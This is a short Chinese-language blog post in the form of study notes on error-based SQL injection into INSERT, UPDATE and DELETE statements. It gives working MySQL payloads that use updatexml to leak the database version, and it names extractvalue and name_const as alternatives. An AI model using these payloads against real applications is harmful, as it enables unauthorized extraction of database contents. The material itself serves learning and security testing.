您的位置:首页 > 其它

insert,update和delete下的注入

2017-01-12 08:46 561 查看
PS:刚开始看到这个注入方式的时候,问米哥:“为啥updatexml就足以报错了,为啥还要使用insert?”知道答案的我觉得问了一个傻蛋的问题。不过没关系。慢慢积累。答案很简单,并不是所有的注入点程序里面执行的都是select语句,也可以是别的。比如insert、update、以及delete。

注入语法


insert into users (id, username, password) values (1,''inject here'','DEF');

insert into users (id, username, password) values (1,""inject here"",'DEF');


注意有个是单引号,有个是双引号。可根据实际场景灵活运用!

  updatexml of payload:and updatexml(1,concat(0x7e,(select @@version),0x7e),1)

insert:

insert into users(id,username,password) values(1,updatexml(null,concat(0x7e,(select @@version),0x7e),null),'DEF');



update:

update users set password='DEF' or updatexml(1,concat(0x7e,(select @@version),0x7e),2);



delect:

DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0);

当然了除了updatexml这个函数还有extractvalue函数。以及我还没有学到的“name_const()”

THE END
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: